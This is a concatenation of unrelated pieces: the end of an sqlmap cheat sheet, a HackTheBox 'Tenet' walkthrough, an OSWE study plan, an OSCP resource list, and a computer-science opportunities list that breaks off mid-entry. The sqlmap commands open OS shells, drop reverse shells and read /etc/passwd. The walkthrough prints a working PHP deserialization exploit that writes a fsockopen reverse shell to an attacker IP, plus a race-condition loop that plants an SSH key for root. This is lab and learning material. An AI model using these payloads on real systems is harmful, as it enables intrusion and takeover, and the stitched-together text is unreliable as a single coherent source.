s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump ``` ### Shell ```bash #Exec command python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami #Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell #Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn ``` ### Read File ```bash --file-read=/etc/passwd ``` ### Crawl a website with SQLmap and auto-exploit ```bash sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ### Second Order Injection ```bash python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs ``` [**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** ## Labs to practice * Learn about sqlmap by using it in the **THM room**: {% embed url="https://tryhackme.com/room/sqlmap" %} ## Customizing Injection ### Set a suffix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### Prefix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') " ``` ### Help finding boolean injection ```bash # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection) sqlmap -r r.txt -p id --not-string ridiculous --batch ``` ### Tamper Remember that **you can create your own tamper in python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](second-order-injection-sqlmap.md). ```bash --tamper=name_of_the_tamper #In kali you can see all the tampers in /usr/share/sqlmap/tamper ``` | Tamper | Description | | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | | apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | | apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | | appendnullbyte.py | Appends encoded NULL byte character at the end of payload | | base64encode.py | Base64 all characters in a given payload | | between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | | bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | | chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | | commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | | commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | | concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' | | charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | | charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022" | | charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022" | | equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | | escapequotes.py | Slash escape quotes (' and ") | | greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | | halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | | ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | | modsecurityversioned.py | Embraces complete query with versioned comment | | modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | | multiplespaces.py | Adds multiple spaces around SQL keywords | | nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | | percentage.py | Adds a percentage sign ('%') infront of each character | | overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | | randomcase.py | Replaces each keyword character with random case value | | randomcomments.py | Add random comments to SQL keywords | | securesphere.py | Appends special crafted string | | sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs | | space2comment.py | Replaces space character (' ') with comments | | space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | | space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | | space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | | space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | | space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | | space2plus.py | Replaces space character (' ') with plus ('+') | | space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and | | unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | | unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | | uppercase.py | Replaces each keyword character with upper case value 'INSERT' | | varnish.py | Append a HTTP header 'X-originating-IP' | | versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | | versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | | xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | <figure><img src="../../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure> [**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\ ¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!: {% embed url="https://www.dragonjarcon.org/" %} <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details>
<p align="center"><img src="src/banner.png" alt="Banner"></img></p> <p align="center">Creator: <a href="https://app.hackthebox.eu/profile/94858">egotisticalSW</a></p> # Personal thoughts This is a custom exploitation box, and you obviously need to know about `PHP Object Injection` and a bit of scripting.. Enjoyed solving it and learned new things; apart from the foothold, it's not even a medium-leveled box. I tried to explain the steps as simple as I can. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting my profile in HTB__. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img> </a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a><br><br> Now, let me get right into it. --- # Reconnaissance First things first, add `tenet.htb 10.10.10.223` line to your `/etc/hosts` file. Let's start with nmap: ```bash nmap -sS -sC -sV -p- 10.10.10.223 ``` ```c PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA) | 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA) |_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: WordPress 5.6 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Tenet Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Here we have only one open port except `22/ssh`, let's go with that then.. ## 80/http Let's start with the direct ip address of the box, which is `10.10.10.223`. ### Direct IP: `10.10.10.223` We have only an "`Apache 2` `Ubuntu` Default Page" here. Let's do some further enumeration: ![](src/directip.png) #### Scanning subdirectories Personally I love `gobuster`, so I'm going with it. You can go with `wfuzz` or `ffuf` or your own tool. ```sh ┌──(root💀f4T1H)-[~/hackthebox/tenet] └─> gobuster dir -q -u http://10.10.10.223 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php -e http://10.10.10.223/users.txt (Status: 200) [Size: 7] http://10.10.10.223/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.223/wordpress/] ``` `users.txt`, hmm interesting. But as you can see below we have nothing but `Success` string inside it.. ![](src/userstxt.png) We have a wordpress site -which we saw in the `nmap` result- in `/wordpress/` directory. Let's continue with the wordpress domain then, `tenet.htb`. ### Domain: `tenet.htb` Here we have the wordpress site and some posts.. ![](src/domainname.png) - Scannning for subdirectories on `tenet.htb` only gives us general wordpress directories. - Nothing interesting in `wpscan` result. While enumerating inside the page, I found a comment in the post `Migration`. ![](src/satorphp.png) Here we got two things: - A username: `neil` - A file named `sator.php` and its backup. Let's first learn which extensions are being used in backup files.. ![](src/backupextension.png) Okay, now we need to check these 3 backup extensions with their two variations (uppercase and lowercase) and on the two `root` directories which are `tenet.htb/` and `10.10.10.223/`. After the hit and try, I found the files in `10.10.10.223/sator.php` and `10.10.10.223/sator.php.bak`. Download and move `sator.php.bak` into your current working directory. __sator.php__ ![](src/satorphpcontent.png) __sator.php.bak__ ```php <?php class DatabaseExport { public $user_file = 'users.txt'; public $data = ''; public function update_db() { echo '[+] Grabbing users from text file <br>'; $this-> data = 'Success'; } public function __destruct() { file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data); echo '[] Database updated <br>'; // echo 'Gotta get this working properly...'; } } $input = $_GET['arepo'] ?? ''; $databaseupdate = unserialize($input); $app = new DatabaseExport; $app -> update_db(); ?> ``` # Foothold: `PHP Object Injection` aka `Deserialization` __Okay, here comes my explanation:__ >In a PHP code, if a class has a function named `__destruct`; when we `unserialize` the class, PHP calls the `__destruct` function in that class. Problem begins in the class's `__destruct` function's content; if the function writes variables' data to a file, then we can exploit it by changing values of serialized class's variables. - Google to know more about this vulnerability. - You may want to read [this](https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a/) article to make things more clear in your brain. - If you know Turkish, [this](https://www.mehmetince.net/php-object-injection-saldirilari-ve-korunmasi/) article by [@mdisec](https://github.com/mdisec) can also be useful for you. __The relationship with our case:__ - We see the code looks for a GET input variable "`arepo`" and `unserializes` it. - The function `__destruct` in the class `DatabaseExport` uses `file_put_contents` to write the variable data to the file defined in the variable `user_file` Now we need to make some differences on the PHP code to exploit this vulnerability and get a reverse shell. I left the parts we don't need in the code too so that you can see what exactly we changed in the code. ## Scripting time XD ![](src/xd.gif) This script we modified writes `DatabaseExport` class to our local machine, defines the `user_file` variable as a PHP file and the data as a reverse_shell to our localhost. #### exploit.php ```php <?php class DatabaseExport { public $user_file = 'shell.php'; public $data = '<?php $sock=fsockopen("YOUR_IP_HERE",2121);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>'; // public $user_file = 'users.txt'; // public $data = ''; // public function update_db() // { // echo '[+] Grabbing users from text file <br>'; // $this-> data = 'Success'; // } // public function __destruct() { file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data); echo '[] Database updated <br>'; // echo 'Gotta get this working properly...'; } } $url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport)); $response = file_get_contents("$url"); $response = file_get_contents("http://10.10.10.223/shell.php"); //$input = $_GET['arepo'] ?? ''; //$databaseupdate = unserialize($input); //$app = new DatabaseExport; //$app -> update_db(); ?> ``` ## Getting the `shell` Now the only thing we need to do is running a `nc` listener and firing up the exploit.php. __Attention__: Change the ip address part. ![](src/shell.png) __💥BOOM We got a shell as `www-data`!!!__ # Privilege Escalation: Race Condition Before escalating to `root`, let's first become the user `neil` as you can remember we found him in comments. ## Escalating to user There's a `/var/www/html/wordpress` directory, and usually the wordpress directories contain credentials inside a file named wp-config.php in them. ![](src/creds.png) Now we can SSH into the machine as the user. ## Escalating to `root` Before running anything else, let's check if we have any sudo privileges with `sudo -l` as we know our password. ```bash neil@tenet:~$ sudo -l Matching Defaults entries for neil on tenet: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\: User neil may run the following commands on tenet: (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh neil@tenet:~$ ``` __/usr/local/bin/enableSSH.sh__ ```bash #!/bin/bash checkAdded() { sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3) if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then /bin/echo "Successfully added $sshName to authorized_keys file!" else /bin/echo "Error in adding $sshName to authorized_keys file!" fi } checkFile() { if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then /bin/echo "Error in creating key file!" if [[ -f $1 ]]; then /bin/rm $1; fi exit 1 fi } addKey() { tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX) (umask 110; touch $tmpName) /bin/echo $key >>$tmpName checkFile $tmpName /bin/cat $tmpName >>/root/.ssh/authorized_keys /bin/rm $tmpName } key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu" addKey checkAdded ``` Oh, here comes the second fun part, which is a `Race Condition` Let me explain what this script actually does: - First creates a randomly-generated named file format of `/tmp/ssh-XXXXXXXX`. Think like you can add change each of "X" characters in the name with any other random character. - Then writes `root@ubuntu`'s public ssh key inside that file. - After that writes the content of `/tmp/ssh-XXXXXXXX` -which now has the public ssh key of `root` inside it- to `/root/.ssh/authorized_keys`. - And finally deletes the `/tmp/ssh-XXXXXXXX` file. Now the thing is: There is a race condition here because we can change content of the file created with a simple bash looop before the script gets executed the next line which is adding the content to /root/authorized_keys. Through this, we can be able to `ssh` into `[email protected]` without password or any other thing. ## Getting the `root` shell __Attention__: Make sure you have __two__ `ssh` __connection__ to the box as the user `neil`. #### Steps to get `root`: ##### #1 Generate a public-private ssh key pair. Run in your localhost, do not type anything as password or file name, just press _Enter_. ```bash ┌──(root💀f4T1H)-[~/hackthebox/tenet] └─> ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Created directory '/root/.ssh'. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa Your public key has been saved in /root/.ssh/id_rsa.pub ``` ##### #2 Set a loop We need to write our public key immediately to the `/tmp/ssh-XXXXXXXX` file when `/usr/local/bin/enableSSH.sh` is running. Because the file is both being creaated and deleted by `/usr/local/bin/enableSSH.sh`. That means we can't execute write command by hand on time, we need a loop to make things rapidly. Run this in one of your ssh connections. __Attention__: Make sure you copied your public ssh key from `~/.ssh/id_rsa.pub`. ```bash neil@tenet:~$ while true; do echo 'YOUR_PUBLIC_SSH_KEY_HERE' | tee /tmp/ssh-* > /dev/null;done ``` ##### #3 Run the script Now we all set, run the script in the other of your ssh connections with sudo privileges and write our public ssh key into `root`'s `authorized_keys`. __Attention__: You need to run the script 7-8 times. ```bash neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh Successfully added root@ubuntu to authorized_keys file! neil@tenet:~$ ``` #### #4 Connect to box via ssh as `root` If you've done all the steps that I write, we are now able to `ssh` `[email protected]`. ![](src/root.png) And we successfully pwned the machine... ![](src/pwned.gif) --- # Closing If you liked my writeup, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting__ my profile in HTB. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img> </a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a> # Resources |`Exploiting PHP Deserialization`|https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a| |:-|:-| |__`PHP Object Injection Saldırıları`__|__https://www.mehmetince.net/php-object-injection-saldirilari-ve-korunmasi/__| <br> ___-Written by f4T1H-___
# oswe-learning-plan ### Vulns to study - Deserialization - Java - https://www.youtube.com/watch?v=VviY3O-euVQ - https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf - https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - [Deserialization-cheatsheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - https://www.youtube.com/watch?v=oZPZLiY2PeA - https://securitylab.github.com/research/in-memory-data-grid-vulnerabilities - NODEJS - https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf - https://blog.websecurify.com/2017/02/hacking-node-serialize.html - https://www.youtube.com/watch?v=t-zVC-CxYjw - [nodejs deserialization cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html) - C# - https://www.youtube.com/watch?v=eDfGpu3iE4Q - https://www.youtube.com/watch?v=Xfbu-pQ1tIc - PHP - https://vkili.github.io/blog/insecure%20deserialization/pop-chains/ - php Type Juggling - Advanced SQLi techniques ## Playground - [CTF.LIVE](https://www.ctf.live/) - [Hackthebox](https://www.hackthebox.eu/) ### Skill - Source Code Review - [OWASP Secure Code Review Guide](https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf) - https://medium.com/swlh/secure-code-review-and-penetration-testing-of-node-js-and-javascript-apps-41485b1a9518 - Exploit development automation in prefered language - dynamic analysis of web application ### HTB Boxes - [Archam](https://www.youtube.com/watch?v=krC5j1Ab44I) : Java Deserialization - [Falafel](https://www.youtube.com/watch?v=CUbWpteTfio&t=1 ) : PHP Type Juggling - [Zipper](https://www.youtube.com/watch?v=RLvFwiDK_F8&t=75) : API to RCE ( ) - [HackBack](https://www.youtube.com/watch?v=B9nozi1PrhY&t=1) : API to RCE - [Holiday](https://www.youtube.com/watch?v=FvHyt7KrsPE&t=1) : NodeJS Command Injection - [Fighter](https://www.youtube.com/watch?v=CW4mI5BkP9E&t=55) : Boolean SQLi to RCE - [Writeup](https://www.youtube.com/watch?v=GKq4cwBfH24&t=64) : Time Base SQLI to RCE - [Unattended](https://www.youtube.com/watch?v=2SATzCQY0Zw&t=60) : Time Base SQLI to RCE - [Help](https://www.youtube.com/watch?v=XB8CbhfOczU&t=49) : Time Base SQLI to RCE /File upload - [Ghoul](https://www.youtube.com/watch?v=kE36IGAU5rg&t=89) : File upload ### Other labs - [JavaDeserH2HC](https://github.com/joaomatosf/JavaDeserH2HC) - [NodeGoat](https://github.com/OWASP/NodeGoat) - [DSerlab](https://github.com/NickstaDB/DeserLab) - [SQLi to Shell](https://pentesterlab.com/exercises/from_sqli_to_shell/course) - [XSS to RCE](https://pentesterlab.com/exercises/xss_and_mysql_file/course) - [pipe](https://www.vulnhub.com/entry/devrandom-pipe,124/) - [XVNA](https://github.com/vegabird/xvna) ### Tools - ysoserial - Jar : https://github.com/frohoff/ysoserial - .NET : https://github.com/pwntester/ysoserial.net - about payload : http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html - burp plugin : https://github.com/summitt/burp-ysoserial - [GadgetProbe](https://portswigger.net/daily-swig/gadgetprobe-new-tool-simplifies-the-exploitation-of-java-deserialization-vulnerabilities) - [NodeJSscan](https://github.com/ajinabraham/NodeJsScan) - [Frida-node](https://github.com/frida/frida-node) ### Books - [You don't know JS](https://github.com/getify/You-Dont-Know-JS) ### other refs https://github.com/wetw0rk/AWAE-PREP https://medium.com/swlh/secure-code-review-and-penetration-testing-of-node-js-and-javascript-apps-41485b1a9518 https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside https://github.com/lirantal/awesome-nodejs-security
# OSCP-PWK-Prep-Resources- UPDATE 06/01/2020: Hey there friends, I have been very quiet on here, I was surprised to see more people have starred this "guide" more than I expected, so I am glad this provides some use to folks. I do plan on being more active now on here now as I start my OSCP jouney once again. Unfortunately I underestimated the depth of the course and so pretty much found myself struggling in the labs =(. During my time away I have been doing some background studying but not as focused as I want to be before signing up for the lab again. My goal was to actually start again this summer but 2 things occured, Offsec updated the labs and now if I want the updated material AND additional lab time I am looking at spending $999 so I have some $$$ to save. The 2nd delay is because of covid-19, I am blessed to still be working currently but we have idea if things will take a turn so for now I am holding on tight to my purse strings lol. Once I have a better cushion for myself I will feel comfortable dropping $999. During my time away I did sign up for eLearnsecurity PTS course, its an introductory course so does not go that much into depth but I am really enjoying and the content is really high quality, its around $400 which isnt cheap in my expensive but is not as bad as other certification courses. I plan on being more productive and transparent during my go around this time, I may do some videos when I start the course again but for now I will just be updating my github.io blog. A list of the resources I have been using as I prepare for the exam Update: changed wording so that it didnt seem like I already have the certification. My exam is scheduled for the end of December. I also have some more resources that I have found helpful since the last update. I will be adding those sometime this week # OSCP Experience This are the blogs I have found that have given me a good direction to start as I prepared for the course https://www.hacksplaining.com/ http://www.abatchy.com/search/label/OSCP%20Prep http://www.techexams.net/forums/security-certifications/113355-list-recent-oscp-threads.html http://www.jasonbernier.com/oscp-review/ https://localhost.exposed/path-to-oscp/ https://pinboard.in/u:unfo/t:oscp # The Basics - Start Here these are the resources I used to get more comfortable with linux, scripting, TCP/IP, etc. I recommend starting with these especially if you dont have much/any experience https://pentesterlab.com/bootcamp http://www.penguintutor.com/linux/basic-network-reference https://www.cybrary.it/course/advanced-penetration-testing/ https://tulpasecurity.files.wordpress.com/2016/09/tulpa-pwk-prep-guide1.pdf # Metasploit although it has been said that Metasploit use is limited during the exam, Offensive Security recommends getting more familiar with Metasploit. I have been going through the metasploit unleashed course its really good info, i would be suprised if I dont have to come back to this repeatedly https://www.offensive-security.com/metasploit-unleashed/ https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3 # Linux Exploitation https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ Privilege Escalation - Linux https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # TCPDump https://danielmiessler.com/study/tcpdump/ # Buffer Overflows https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481 https://www.exploit-db.com/docs/28475.pdf # Enumeration https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/ http://0daysecurity.com/penetration-testing/enumeration.html # Cheat Sheets for All the Things!!!!!!! https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf https://highon.coffee/blog/nmap-cheat-sheet/ http://www.cheat-sheets.org/saved-copy/Notepad++_Cheat_Sheet.pdf http://www.isical.ac.in/~pdslab/2016/lectures/bash_cheat_sheet.pdf http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.sans.org/security-resources/GoogleCheatSheet.pdf https://www.tunnelsup.com/python-cheat-sheet/ https://www.tunnelsup.com/metasploit-cheat-sheet/ # Reverse and Bind Shell tutorials http://resources.infosecinstitute.com/icmp-reverse-shell/#gref # Text Editor Cheat Sheets https://vim.rtorr.com/ - Vim
# awesome-computer-science-opportunities An awesome list of events and fellowship opportunities for computer science students ## Contents - [Learning Platform](#learning-platform) - [Competitive Programming](#competitive-programming) - [Web Development](#web-development) - [Mobile Development](#mobile-development) - [DevOps](#devops) - [Data Science](#data-science) - [Artificial Intelligence](#artificial-intelligence) - [Computer Science](#computer-science) - [Open Source](#open-source) - [Infosec](#infosec) - [MOOCs](#moocs) - [Fellowships](#fellowshipsscholarships) - [Programming Events](#programming-events) - [Hackathons](#hackathons) - [General Opportunities](#general-opportunities) ## Learning Platform [Back to Top](#contents) ### Competitive Programming * [HackerRank](http://hackerrank.com) - Solve code challenges to prepare for programming interviews. * [HackerEarth](http://hackerearth.com) - Solve code challenges to help companies find innovative solutions for their businesses. * [CodeChef](http://codechef.com) - Non-profit competitive programming platform. * [TopCoder](http://topcoder.com) - Partecipate in code challenges and help solve real world problems. * [CodeForces](http://codeforces.com) - Russian website dedicated to competitive programming. * [ProjectEuler](http://projecteuler.net) - Solve computational and mathematical problems using your programming skills. * [Spoj](http://spoj.com) - Programming contests with online judging system. * [VisuAlgo](https://visualgo.net/en) - Visualising data structures and algorithms through animation. * [LeetCode](https://leetcode.com) - Develop programming skills for your next interview. * [FireCode](https://www.firecode.io/) - An online coding interview preparation. * [CodeWars](https://www.codewars.com/) - Code challenges platform to level up your skills. * [CodinGame](https://www.codingame.com/) - Learn to code by playing games. * [DailyProgrammer](https://www.reddit.com/r/dailyprogrammer/) - Solutions to programming challenges, peer reviewed with community feedback. * [CodeFights](https://codefights.com) - Practice programming and land a job. * [UVa](https://uva.onlinejudge.org) - Programming contests with online judging system. * [Stanford ACM ICPC](https://github.com/jaehyunp/stanfordacm) - Stanford [Notebook](https://github.com/jaehyunp/stanfordacm/blob/master/notebook.pdf) provides printable templates usable during online/on-site contests. * [Exercism](http://exercism.io/) - Solve programming challenges from your terminal. * [DailyCodingProblem](https://www.dailycodingproblem.com/) - Get exceptionally good at coding interviews by solving one problem every day. * [acmp.ru](http://acmp.ru) - Russian programming contests * [Timus Online Judge](http://acm.timus.ru/?locale=en) - Programming contests with online judging system. * [DMOJ: Modern Online Judge](https://dmoj.ca) - contest platform and archive of programming problems ### Web Development * [Learn Enough to Be Dangerous](https://www.learnenough.com/) - Free online coding tutorials on JavaScript, Ruby, Rails, CSS and more. * [FreeCodeCamp](http://freecodecamp.com) - Coding tutorials and challenges. * [Thimble](https://thimble.mozilla.org/en-US/) - Free online code editor, web server, web browser & developer tools. * [NodeSchool](https://nodeschool.io) - Open source workshops that teach web software skills. * [The Odin Project](https://www.theodinproject.com/) - A full free open source coding curriculum. * [Egghead](https://egghead.io/) - Video tutorials on popular JavaScript frameworks. * [Codecademy](https://www.codecademy.com/) - Free and premium interactive tutorials for various languages. * [CodeSchool](https://www.codeschool.com/) - Combination of video and interactive tutorials. * [MDN web docs](https://developer.mozilla.org/en-US/docs/Learn) - Web development articles by Mozilla. * [W3Schools](https://www.w3schools.com/) - Tutorials on HTML, CSS, JavaScript and more. * [Eloquent JavaScript](http://eloquentjavascript.net/) - An online book about JavaScript. * [Coder-Coder](https://www.coder-coder.com/) - Tutorials on Web Development from basics including HTML, CSS, JavaScript and more. * [CodeCraft](https://codecraft.tv/) - Provide Web Developement Courses on Javascript, AngularJS, Angular 5 for free. * [Scrimba](https://scrimba.com/) - Provides Web Development Courses with a unique feature of live interaction with the instructor's code. ### Mobile Development * [Udacity Android Nanodegree](https://in.udacity.com/course/android-developer-nanodegree-by-google--nd801) - Students can also apply for [scholarship](https://in.udacity.com/google-india-scholarships) given by Google. * [Android Developer Training](https://developers.google.com/training/android/) - Range of courses to help you build Android apps. * [Vogella](http://www.vogella.com/tutorials/android.html) - Tutorials about Android development. * [Android Hive](https://www.androidhive.info) - Android tutorials blog. * [iOS development](https://in.udacity.com/course/intro-to-ios-app-development-with-swift--ud585) - Build your first iOS app with an Udacity course. ### DevOps * [DevOps Bootcamp](http://devopsbootcamp.osuosl.org/start-here.html) - Course dedicated to teach core software development and systems operation skills. * [Google IT Support Course](https://www.coursera.org/specializations/google-it-support) - Google course to prepare you for a job in IT support. ### Data Science * [Kaggle](http://kaggle.com) - Data science competitive platform. * [DataQuest](http://dataquest.io) - Learn data science with your browser. * [DataCamp](http://datacamp.com) - Learn data science online. * [DrivenData](https://www.drivendata.org/) - Partecipate in data science competitions and help organizations. * [Analytics Vidhya](http://analyticsvidhya.com) - Training and Q&A platform based around data science. * [fast.ai](http://course.fast.ai/) - Deep Learning with only prerequisite being general coding skills. * [TunedIT](http://tunedit.org/data-competitions) - Data Mining competitions. * [Data Science Central](https://www.datasciencecentral.com/) - the online resource for big data practitioners. * [KPMG Data Science Virtual 